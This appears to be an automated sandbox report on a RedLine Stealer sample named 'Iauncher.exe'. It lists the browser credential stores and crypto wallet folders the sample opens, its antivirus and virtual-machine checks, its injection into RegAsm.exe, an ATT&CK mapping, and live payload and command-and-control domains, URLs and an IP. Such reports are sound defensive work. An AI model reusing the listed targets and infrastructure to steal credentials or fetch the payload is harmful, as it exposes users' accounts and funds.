                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00566C92 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_00566C92
                          Source: C:\Users\user\Desktop\Iauncher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: RegAsm.exe, 0000000D.00000002.1443890601.0000000005630000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1448635359.0000000006DA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected RedLine Stealer
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 11.2.Iauncher.exe.590030.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.Iauncher.exe.590030.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.Iauncher.exe.560000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000D.00000002.1431945457.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Iauncher.exe PID: 7256, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7324, type: MEMORYSTR
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                          Source: Yara matchFile source: 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7324, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected RedLine Stealer
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 11.2.Iauncher.exe.590030.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.Iauncher.exe.590030.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.Iauncher.exe.560000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000D.00000002.1431945457.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Iauncher.exe PID: 7256, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7324, type: MEMORYSTR

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		1
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		1
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		1
                          Input Capture                          		2
                          File and Directory Discovery                          		Remote Desktop Protocol2
                          Data from Local System                          		11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
                          Obfuscated Files or Information                          		Security Account Manager134
                          System Information Discovery                          		SMB/Windows Admin Shares1
                          Input Capture                          		1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Install Root Certificate                          		NTDS251
                          Security Software Discovery                          		Distributed Component Object ModelInput Capture2
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script13
                          Software Packing                          		LSA Secrets1
                          Process Discovery                          		SSHKeylogging13
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Timestomp                          		Cached Domain Credentials241
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          DLL Side-Loading                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          Masquerading                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt241
                          Virtualization/Sandbox Evasion                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                          Process Injection                          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1434866 Sample: Iauncher.exe Startdate: 01/05/2024 Architecture: WINDOWS Score: 96 23 google.com 2->23 25 gitgo.org 2->25 27 antiloxss.usite.pro 2->27 45 Snort IDS alert for network traffic 2->45 47 Found malware configuration 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 6 other signatures 2->51 8 Iauncher.exe 15 6 2->8         started        signatures3 process4 dnsIp5 29 google.com 172.253.122.101 GOOGLEUS United States 8->29 31 antiloxss.usite.pro 193.109.246.100, 443, 49699, 49702 COMPUBYTE-ASRU Virgin Islands (BRITISH) 8->31 33 gitgo.org 172.67.202.98, 443, 49710 CLOUDFLARENETUS United States 8->33 21 C:\Users\user\AppData\...\Iauncher.exe, PE32 8->21 dropped 12 Iauncher.exe 1 8->12         started        file6 process7 signatures8 53 Machine Learning detection for dropped file 12->53 55 Writes to foreign memory regions 12->55 57 Allocates memory in foreign processes 12->57 59 Injects a PE file into a foreign processes 12->59 15 RegAsm.exe 6 24 12->15         started        19 conhost.exe 12->19         started        process9 dnsIp10 35 147.45.47.65, 47232, 49711 FREE-NET-ASFREEnetEU Russian Federation 15->35 37 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->37 39 Installs new ROOT certificates 15->39 41 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 15->41 43 2 other signatures 15->43 signatures11

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          Iauncher.exe24%ReversingLabsByteCode-MSIL.Trojan.Zilla
                          Iauncher.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe100%Joe Sandbox ML

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://tempuri.org/Entity/Id21Response0%Avira URL Cloudsafe
                          https://www.siticoneframework.com/0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id12Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id80%Avira URL Cloudsafe
                          https://gitgo.org0%Avira URL Cloudsafe
                          https://gitgo.org/Iauncher.zipd0%Avira URL Cloudsafe
                          http://tempuri.org/0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id2Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id23ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id90%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id40%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id70%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id50%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id6Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id60%Avira URL Cloudsafe
                          http://gitgo.org0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id15Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id1ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id19Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id9Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id200%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id210%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id220%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id230%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id240%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id1Response0%Avira URL Cloudsafe
                          https://gitgo.org/Iauncher.zip0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id24Response0%Avira URL Cloudsafe
                          http://ns.adp/1.0/0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id110%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id120%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id100%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id130%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id16Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id140%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id160%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id150%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id5Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id180%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id170%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id190%Avira URL Cloudsafe
                          http://gitgo.orgd0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id10Response0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          antiloxss.usite.pro
                          		193.109.246.100
                          		truefalse
                            		high
                            google.com
                            		172.253.122.101
                            		truefalse
                              		high
                              gitgo.org
                              		172.67.202.98
                              		truefalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txtfalse
                                  		high
                                  https://antiloxss.usite.pro/STLprograms/NEW/hwid.txtfalse
                                    		high
                                    https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txtfalse
                                      		high
                                      https://gitgo.org/Iauncher.zipfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txtfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/02/sc/sctRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://gitgo.org/Iauncher.zipdIauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Entity/Id23ResponseDRegAsm.exe, 0000000D.00000002.1436621457.00000000025EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://tempuri.org/Entity/Id12ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://gitgo.orgIauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://tempuri.org/RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://tempuri.org/Entity/Id2ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txtdIauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://tempuri.org/Entity/Id21ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.siticoneframework.com/Iauncher.exe, 00000000.00000002.3676644672.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3682596392.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://tempuri.org/Entity/Id9RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tempuri.org/Entity/Id8RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://tempuri.org/Entity/Id5RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://tempuri.org/Entity/Id4RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://tempuri.org/Entity/Id7RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://tempuri.org/Entity/Id6RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id19ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/faultRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsatRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id15ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameIauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txtt-Iauncher.exe, 00000000.00000002.3676644672.0000000002BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://gitgo.orgIauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://tempuri.org/Entity/Id6ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txtt-Iauncher.exe, 00000000.00000002.3676644672.0000000002BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/hwids.txtdIauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://api.ip.sb/ipIauncher.exe, Iauncher.exe, 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp, RegAsm.exe, 0000000D.00000002.1431945457.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://vimeo.com/api/v2/video/Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/scRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
